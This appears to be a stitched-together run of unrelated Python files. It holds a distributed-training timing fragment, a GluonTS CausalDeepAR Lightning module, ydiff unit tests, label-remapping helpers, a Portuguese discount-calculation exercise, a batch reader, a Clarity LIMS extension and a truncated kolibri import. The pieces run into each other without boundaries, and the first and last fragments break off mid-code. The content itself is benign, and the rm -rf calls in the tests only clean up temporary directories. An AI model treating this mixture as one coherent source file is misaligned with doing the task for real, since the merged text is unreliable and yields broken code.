fleet.util.all_reduce(local_cost, mode="max") logger.info("max train time %f mins" % (float(global_cost[0]) / 60.0)) logger.info("max train time: %f", global_cost[0]) def get_min_cost_mins(value): #from mpi4py import MPI local_cost = np.array([value]) global_cost = np.copy(local_cost) * 0 #fleet._role_maker._node_type_comm.Allreduce(local_cost, global_cost, op=MPI.MIN) global_cost = fleet.util.all_reduce(local_cost, mode="min") logger.info("min train time %f mins" % (float(global_cost[0]) / 60.0)) # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. from typing import Dict, Tuple import pytorch_lightning as pl import torch from gluonts.torch.modules.loss import DistributionLoss, NegativeLogLikelihood from gluonts.torch.util import weighted_average from .module import CausalDeepARModel class CausalDeepARLightningModule(pl.LightningModule): def __init__( self, model: CausalDeepARModel, loss: DistributionLoss = NegativeLogLikelihood(), lr: float = 1e-3, weight_decay: float = 1e-8, control_loss_weight: float = 1.0, ) -> None: super().__init__() self.save_hyperparameters() self.model = model self.loss = loss self.lr = lr self.weight_decay = weight_decay self.control_loss_weight = control_loss_weight def _compute_loss(self, batch: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]: feat_static_cat = batch["feat_static_cat"] feat_static_real = batch["feat_static_real"] past_time_feat = batch["past_time_feat"] past_target = batch["past_target"] future_time_feat = batch["future_time_feat"] future_target = batch["future_target"] past_observed_values = batch["past_observed_values"] future_observed_values = batch["future_observed_values"] past_control = batch["past_control"] future_control = batch["future_control"] control_distr, distr = self.model.distribution( feat_static_cat=feat_static_cat, feat_static_real=feat_static_real, past_time_feat=past_time_feat, past_target=past_target, past_observed_values=past_observed_values, future_time_feat=future_time_feat, future_target=future_target, future_observed_values=future_observed_values, past_control=past_control, future_control=future_control, ) context_target = past_target[:, -self.model.context_length + 1 :] target = torch.cat( (context_target, future_target), dim=1, ) context_control = past_control[:, -self.model.context_length + 1:] control = torch.cat( (context_control, future_control), dim=1, ) context_observed = past_observed_values[ :, -self.model.context_length + 1 : ] observed_values = torch.cat( (context_observed, future_observed_values), dim=1 ) if len(self.model.target_shape) == 0: loss_weights = observed_values else: loss_weights = observed_values.min(dim=-1, keepdim=False) control_loss = weighted_average(self.loss(control_distr, control), weights=loss_weights) target_loss = weighted_average(self.loss(distr, target), weights=loss_weights) return control_loss, target_loss def training_step(self, batch, batch_idx: int): """Execute training step""" train_control_loss, train_target_loss = self._compute_loss(batch) train_loss = self.control_loss_weight * train_control_loss + train_target_loss self.log( "train_control_loss", train_control_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "train_target_loss", train_target_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "train_loss", train_loss, on_epoch=True, on_step=False, prog_bar=True, ) return train_loss def validation_step(self, batch, batch_idx: int): """Execute validation step""" val_control_loss, val_target_loss = self._compute_loss(batch) val_loss = self.control_loss_weight * val_control_loss + val_target_loss self.log( "val_control_loss", val_control_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "val_target_loss", val_target_loss, on_epoch=True, on_step=False, prog_bar=True, ) self.log( "val_loss", val_loss, on_epoch=True, on_step=False, prog_bar=True, ) return val_loss def configure_optimizers(self): """Returns the optimizer to use""" return torch.optim.Adam( self.model.parameters(), lr=self.lr, weight_decay=self.weight_decay, ) #!/usr/bin/env python # -*- coding: utf-8 -*- """Unit test for ydiff""" import sys import unittest import tempfile import subprocess import os sys.path.insert(0, '') import ydiff # nopep8 class Sequential(object): """A non-seekable iterator, mock of file object""" def __init__(self, items): self._items = items self._index = 0 def __iter__(self): while True: try: item = self._items[self._index] except IndexError: raise StopIteration yield item self._index += 1 def readline(self): try: item = self._items[self._index] except IndexError: return '' self._index += 1 return item class PatchStreamTest(unittest.TestCase): def test_is_empty(self): stream = ydiff.PatchStream(Sequential([])) self.assertTrue(stream.is_empty()) stream = ydiff.PatchStream(Sequential(['hello', 'world'])) self.assertFalse(stream.is_empty()) class DecodeTest(unittest.TestCase): def test_normal(self): utext = 'hello'.encode('utf-8') self.assertEqual('hello', ydiff.decode(utext)) def test_latin_1(self): text = '\x80\x02q\x01(U' if sys.version_info[0] == 2: decoded_text = text.decode('latin-1') else: decoded_text = text self.assertEqual(decoded_text, ydiff.decode(text)) class HunkTest(unittest.TestCase): def test_get_old_text(self): hunk = ydiff.Hunk([], '@@ -1,2 +1,2 @@', (1, 2), (1, 2)) hunk.append(('-', 'foo\n')) hunk.append(('+', 'bar\n')) hunk.append((' ', 'common\n')) self.assertEqual(hunk._get_old_text(), ['foo\n', 'common\n']) def test_get_new_text(self): hunk = ydiff.Hunk([], '@@ -1,2 +1,2 @@', (1, 2), (1, 2)) hunk.append(('-', 'foo\n')) hunk.append(('+', 'bar\n')) hunk.append((' ', 'common\n')) self.assertEqual(hunk._get_new_text(), ['bar\n', 'common\n']) class DiffMarkupTest(unittest.TestCase): def _init_diff(self): """Return a minimal diff contains all required samples header --- old +++ new hunk header @@ -1,5 +1,5 @@ -hhello +helloo +spammm world -garb -Again - tabbed +again + spaced """ hunk = ydiff.Hunk(['hunk header\n'], '@@ -1,5 +1,5 @@\n', (1, 5), (1, 5)) hunk.append(('-', 'hhello\n')) hunk.append(('+', 'helloo\n')) hunk.append(('+', 'spammm\n')) hunk.append((' ', 'world\n')) hunk.append(('-', 'garb\n')) hunk.append(('-', 'Again\n')) hunk.append(('-', ' tabbed\n')) hunk.append(('+', 'again\n')) hunk.append(('+', ' spaced\n')) diff = ydiff.UnifiedDiff( ['header\n'], '--- old\n', '+++ new\n', [hunk]) return diff def test_markup_traditional_hunk_header(self): hunk = ydiff.Hunk(['hunk header\n'], '@@ -0 +0 @@\n', (0, 0), (0, 0)) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 4) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;34m@@ -0 +0 @@\n\x1b[0m') def test_markup_traditional_old_changed(self): hunk = ydiff.Hunk([], '@@ -1 +0,0 @@\n', (1, 0), (0, 0)) hunk.append(('-', 'spam\n')) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 4) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;34m@@ -1 +0,0 @@\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;31m-spam\n\x1b[0m') def test_markup_traditional_new_changed(self): hunk = ydiff.Hunk([], '@@ -0,0 +1 @@\n', (0, 0), (1, 0)) hunk.append(('+', 'spam\n')) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 4) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;34m@@ -0,0 +1 @@\n\x1b[0m') self.assertEqual(out[3], '\x1b[32m+spam\n\x1b[0m') def test_markup_traditional_both_changed(self): hunk = ydiff.Hunk([], '@@ -1,2 +1,2 @@\n', (1, 2), (1, 2)) hunk.append(('-', 'hella\n')) hunk.append(('+', 'hello\n')) hunk.append((' ', 'common\n')) diff = ydiff.UnifiedDiff([], '--- old\n', '+++ new\n', [hunk]) marker = ydiff.DiffMarker() out = list(marker.markup(diff)) self.assertEqual(len(out), 6) self.assertEqual(out[0], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[2], '\x1b[1;34m@@ -1,2 +1,2 @@\n\x1b[0m') self.assertEqual( out[3], '\x1b[1;31m-\x1b[0m\x1b[31mhell' '\x1b[4m\x1b[31ma\x1b[0m\x1b[31m\n\x1b[0m') self.assertEqual( out[4], '\x1b[32m+\x1b[0m\x1b[32mhell' '\x1b[4m\x1b[32mo\x1b[0m\x1b[32m\n\x1b[0m') self.assertEqual(out[5], '\x1b[0m common\n\x1b[0m') def test_markup_side_by_side_padded(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=7) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m ' '\x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m \x1b[0m\x1b[1;35m>\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spaced\x1b[0m\n') # This test is not valid anymore def __test_markup_side_by_side_neg_width(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=-1) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,4 +1,4 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' + (' ' * 74) + '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\x1b[32m\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m ' '\x1b[0m ' + (' ' * 80) + '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' + (' ' * 75) + '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' + (' ' * 75) + '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') def test_markup_side_by_side_off_by_one(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=6) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m \x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m \x1b[0m\x1b[1;35m>\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spac\x1b[0m\x1b[1;35m>\x1b[0m\n') def test_markup_side_by_side_wrapped(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=5) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhel\x1b[0m\x1b[1;35m>\x1b[0m ' # nopep8 '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhell\x1b[0m\x1b[1;35m>\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m \x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '' '\x1b[32mspam\x1b[0m\x1b[1;35m>\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m \x1b[0m\x1b[1;35m>\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spa\x1b[0m\x1b[1;35m>\x1b[0m\n') def test_markup_side_by_side_tabbed(self): diff = self._init_diff() marker = ydiff.DiffMarker(side_by_side=True, width=8, tab_width=2) out = list(marker.markup(diff)) self.assertEqual(len(out), 11) sys.stdout.write('\n') for markup in out: sys.stdout.write(markup) self.assertEqual(out[0], '\x1b[36mheader\n\x1b[0m') self.assertEqual(out[1], '\x1b[33m--- old\n\x1b[0m') self.assertEqual(out[2], '\x1b[33m+++ new\n\x1b[0m') self.assertEqual(out[3], '\x1b[1;36mhunk header\n\x1b[0m') self.assertEqual(out[4], '\x1b[1;34m@@ -1,5 +1,5 @@\n\x1b[0m') self.assertEqual( out[5], '\x1b[33m1\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31mh\x1b[0m\x1b[31mhello\x1b[0m ' '\x1b[0m\x1b[33m1\x1b[0m ' '\x1b[32mhello\x1b[7m\x1b[32mo\x1b[0m\n') self.assertEqual( out[6], '\x1b[33m ' '\x1b[0m ' '\x1b[0m\x1b[33m2\x1b[0m ' '\x1b[32mspammm\x1b[0m\n') self.assertEqual( out[7], '\x1b[33m2\x1b[0m ' '\x1b[0mworld\x1b[0m ' '\x1b[0m\x1b[33m3\x1b[0m ' '\x1b[0mworld\x1b[0m\n') self.assertEqual( out[8], '\x1b[33m3\x1b[0m ' '\x1b[1;31mgarb\x1b[0m ' '\x1b[0m\x1b[33m ' '\x1b[0m \n') self.assertEqual( out[9], '\x1b[33m4\x1b[0m ' '\x1b[31m\x1b[4m\x1b[31mA\x1b[0m\x1b[31mgain\x1b[0m ' '\x1b[0m\x1b[33m4\x1b[0m ' '\x1b[32m\x1b[4m\x1b[32ma\x1b[0m\x1b[32mgain\x1b[0m\n') self.assertEqual( out[10], '\x1b[33m5\x1b[0m ' '\x1b[31m\x1b[7m\x1b[31m tabbed\x1b[0m ' '\x1b[0m\x1b[33m5\x1b[0m ' '\x1b[32m\x1b[7m\x1b[32m spaced\x1b[0m\n') class UnifiedDiffTest(unittest.TestCase): diff = ydiff.UnifiedDiff(None, None, None, None) def test_is_hunk_meta_normal(self): self.assertTrue(self.diff.is_hunk_meta('@@ -1 +1 @@')) self.assertTrue(self.diff.is_hunk_meta('@@ -3,7 +3,6 @@')) self.assertTrue(self.diff.is_hunk_meta('@@ -3,7 +3,6 @@ class Foo')) self.assertTrue(self.diff.is_hunk_meta('@@ -3,7 +3,6 @@ class Foo\n')) self.assertTrue( self.diff.is_hunk_meta('@@ -3,7 +3,6 @@ class Foo\r\n')) def test_is_hunk_meta_svn_prop(self): self.assertTrue(self.diff.is_hunk_meta('## -0,0 +1 ##')) self.assertTrue(self.diff.is_hunk_meta('## -0,0 +1 ##\n')) self.assertTrue(self.diff.is_hunk_meta('## -0,0 +1 ##\r\n')) def test_is_hunk_meta_neg(self): self.assertFalse(self.diff.is_hunk_meta('@@ -1 + @@')) self.assertFalse(self.diff.is_hunk_meta('@@ -this is not a hunk meta')) self.assertFalse(self.diff.is_hunk_meta('## -this is not either')) def test_parse_hunk_meta_normal(self): self.assertEqual(self.diff.parse_hunk_meta('@@ -3,7 +3,6 @@'), ((3, 7), (3, 6))) def test_parse_hunk_meta_missing(self): self.assertEqual(self.diff.parse_hunk_meta('@@ -3 +3,6 @@'), ((3, 1), (3, 6))) self.assertEqual(self.diff.parse_hunk_meta('@@ -3,7 +3 @@'), ((3, 7), (3, 1))) self.assertEqual(self.diff.parse_hunk_meta('@@ -3 +3 @@'), ((3, 1), (3, 1))) def test_parse_hunk_meta_svn_prop(self): self.assertEqual(self.diff.parse_hunk_meta('## -0,0 +1 ##'), ((0, 0), (1, 1))) def test_is_old(self): self.assertTrue(self.diff.is_old('-hello world')) self.assertTrue(self.diff.is_old('----')) # yaml def test_is_old_neg(self): self.assertFalse(self.diff.is_old('--- considered as old path')) self.assertFalse(self.diff.is_old('-' * 72)) # svn log --diff def test_is_new(self): self.assertTrue(self.diff.is_new('+hello world')) self.assertTrue(self.diff.is_new('++++hello world')) def test_is_new_neg(self): self.assertFalse(self.diff.is_new('+++ considered as new path')) class DiffParserTest(unittest.TestCase): def test_parse_invalid_hunk_meta(self): patch = """\ spam --- a +++ b spam @@ -a,a +0 @@ """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) self.assertRaises(RuntimeError, list, parser.get_diff_generator()) def test_parse_dangling_header(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common spam """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 2) self.assertEqual(len(out[1]._headers), 1) self.assertEqual(out[1]._headers[0], 'spam\n') self.assertEqual(out[1]._old_path, '') self.assertEqual(out[1]._new_path, '') self.assertEqual(len(out[1]._hunks), 0) def test_parse_missing_new_path(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common --- c """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) self.assertRaises(AssertionError, list, parser.get_diff_generator()) def test_parse_missing_hunk_meta(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common --- c +++ d """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 2) self.assertEqual(len(out[1]._headers), 0) self.assertEqual(out[1]._old_path, '--- c\n') self.assertEqual(out[1]._new_path, '+++ d\n') self.assertEqual(len(out[1]._hunks), 0) def test_parse_missing_hunk_list(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common --- c +++ d @@ -1,2 +1,2 @@ """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) self.assertRaises(AssertionError, list, parser.get_diff_generator()) def test_parse_only_in_dir(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common Only in foo: foo --- c +++ d @@ -1,2 +1,2 @@ -foo +bar common """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 3) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._headers, ['Only in foo: foo\n']) self.assertEqual(len(out[2]._hunks), 1) self.assertEqual(len(out[2]._hunks[0]._hunk_list), 3) def test_parse_only_in_dir_at_last(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common Only in foo: foo """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 2) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._headers, ['Only in foo: foo\n']) def test_parse_binary_differ_diff_ru(self): patch = """\ --- a +++ b @@ -1,2 +1,2 @@ -foo +bar common Binary files a/1.pdf and b/1.pdf differ --- c +++ d @@ -1,2 +1,2 @@ -foo +bar common """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 3) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._old_path, '') self.assertEqual(out[1]._new_path, '') self.assertEqual(len(out[1]._headers), 1) self.assertTrue(out[1]._headers[0].startswith('Binary files')) self.assertEqual(len(out[2]._hunks), 1) self.assertEqual(len(out[2]._hunks[0]._hunk_list), 3) def test_parse_binary_differ_git(self): patch = """\ diff --git a/foo b/foo index 529d8a3..ad71911 100755 --- a/foo +++ b/foo @@ -1,2 +1,2 @@ -foo +bar common diff --git a/example.pdf b/example.pdf index 1eacfd8..3696851 100644 Binary files a/example.pdf and b/example.pdf differ diff --git a/bar b/bar index 529e8a3..ad71921 100755 --- a/bar +++ b/bar @@ -1,2 +1,2 @@ -foo +bar common """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 3) self.assertEqual(len(out[1]._hunks), 0) self.assertEqual(out[1]._old_path, '') self.assertEqual(out[1]._new_path, '') self.assertEqual(len(out[1]._headers), 3) self.assertTrue(out[1]._headers[2].startswith('Binary files')) self.assertEqual(len(out[2]._hunks), 1) self.assertEqual(len(out[2]._hunks[0]._hunk_list), 3) def test_parse_svn_prop(self): patch = """\ --- a +++ b Added: svn:executable ## -0,0 +1 ## +* \\ No newline at end of property Added: svn:keywords ## -0,0 +1 ## +Id """ items = patch.splitlines(True) stream = ydiff.PatchStream(Sequential(items)) parser = ydiff.DiffParser(stream) out = list(parser.get_diff_generator()) self.assertEqual(len(out), 1) self.assertEqual(len(out[0]._hunks), 2) hunk = out[0]._hunks[1] self.assertEqual(hunk._hunk_headers, ['Added: svn:keywords\n']) self.assertEqual(hunk._hunk_list, [('+', 'Id\n')]) @unittest.skipIf(os.name == 'nt', 'Travis CI Windows not ready for shell cmds') class MainTest(unittest.TestCase): def setUp(self): self._cwd = os.getcwd() self._ws = tempfile.mkdtemp(prefix='test_ydiff') self._non_ws = tempfile.mkdtemp(prefix='test_ydiff') cmd = ('cd %s; git init; git config user.name me; ' 'git config user.email <EMAIL>') % self._ws subprocess.call(cmd, shell=True, stdout=subprocess.PIPE) self._change_file('init') def tearDown(self): os.chdir(self._cwd) cmd = ['/bin/rm', '-rf', self._ws, self._non_ws] subprocess.call(cmd) def _change_file(self, text): cmd = ['/bin/sh', '-c', 'cd %s; echo "%s" > foo' % (self._ws, text)] subprocess.call(cmd) def _commit_file(self): cmd = ['/bin/sh', '-c', 'cd %s; git add foo; git commit foo -m update' % self._ws] subprocess.call(cmd, stdout=subprocess.PIPE) def test_preset_options(self): os.environ['YDIFF_OPTIONS'] = '--help' self.assertRaises(SystemExit, ydiff.main) os.environ.pop('YDIFF_OPTIONS', None) def test_read_diff(self): sys.argv = sys.argv[:1] self._change_file('read_diff') os.chdir(self._ws) ret = ydiff.main() os.chdir(self._cwd) self.assertEqual(ret, 0) # Following 3 tests does not pass on Travis anymore due to tty problem def _test_read_log(self): sys.argv = [sys.argv[0], '--log'] self._change_file('read_log') self._commit_file() os.chdir(self._ws) ret = ydiff.main() os.chdir(self._cwd) self.assertEqual(ret, 0) def _test_read_diff_neg(self): sys.argv = sys.argv[:1] os.chdir(self._non_ws) ret = ydiff.main() os.chdir(self._cwd) self.assertNotEqual(ret, 0) def _test_read_log_neg(self): sys.argv = [sys.argv[0], '--log'] os.chdir(self._non_ws) ret = ydiff.main() os.chdir(self._cwd) self.assertNotEqual(ret, 0) if __name__ == '__main__': unittest.main() # vim:set et sts=4 sw=4 tw=80: import torch import numpy as np def createDictLabels(labels): """ Creates dictionaries that fits data with non-sequential labels into a sequential order label from [0...nClasses]. :param labels: all the non-sequential labels :return: dict that converts from non-sequential to sequential, dict that converts from sequential to non-sequential """ # Re-arange the Target vectors between [0..nClasses_train] labels = labels.numpy() unique_labels = np.unique(labels) dictLabels = {val: i for i, val in enumerate(unique_labels)} dictLabelsInverse = {i: val for i, val in enumerate(unique_labels)} return dictLabels,dictLabelsInverse def fitLabelsToRange(dictLabels,labels): """ Converts Tensor values to the values contained in the dictionary :param dictLabels: dictionary with the conversion values :param labels: Tensor to convert :return: Tensor with the converted labels. """ labels = labels.numpy() unique_labels = np.unique(labels) labels_temp = np.array(labels) for i in dictLabels.keys(): labels_temp[labels == i] = dictLabels[i] labels = labels_temp return torch.from_numpy(labels) def unflattenParams(model,flatParams): flatParams = flatParams.squeeze() indx = 0 for param in model.net.parameters(): lengthParam = param.view(-1).size()[0] param.data = flatParams[indx:indx+lengthParam].view_as(param).data indx = indx + lengthParam a = 0 <reponame>LeonardoPereirajr/Curso_em_video_Python preco = float(input('Qual o preço do produto ? : ')) desc = 0.05 novo = preco - (preco * 0.05) print(' O valor deste produto com desconto da loja é de R$ {}'.format(novo))""" pycraigslist.tests.test_unit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A suite of modules to unit test the pycraigslist module. """ from typing import Sized import numpy as np class BatchReader: def __init__(self, *data: Sized, batch_size: int = 32): """ Class that handles batch reading of data. It's an iterator that subsequently reads data Args: *data: sequence of data parts that should be read. The sizes of all data parts must be the same. batch_size: the size of the batch """ self.data = data data_parts_num = len(data) assert data_parts_num > 0 self.data_size = len(data[0]) assert data_parts_num < 1 or all( len(datum) == self.data_size for datum in data ), f"{[len(datum) for datum in data]}" self.batch_size = batch_size self.idx = 0 def __iter__(self): return self def __next__(self): if self.idx < self.data_size: cur_idx = self.idx self.idx += self.batch_size batch = [] for datum in self.data: batch.append(datum[cur_idx : cur_idx + self.batch_size]) return batch else: self.idx = 0 raise StopIteration def __len__(self): return np.math.ceil(self.data_size / self.batch_size) from clarity_ext.extensions import GeneralExtension class Extension(GeneralExtension): """ Make sure user has confirmed that a run was failed """ def execute(self): if self.context.current_step.udf_rtpcr_passed == "False": self.require_step_udf("Confirm failed run:") def require_step_udf(self, required_udf): udf_value = '' udf_exists = required_udf in self.context.current_step.udf_map.raw_map if udf_exists: udf_value = self.context.current_step.udf_map[required_udf].value if not udf_value == "Done": self.usage_error_defer("Please confirm that the run was failed: '{}'", required_udf) def integration_tests(self): yield self.test("24-39269", commit=False) <reponame>danigm/kolibri-installer-gnome import logging logger = logging.getLogger(__name__) import multiprocessing from ctypes 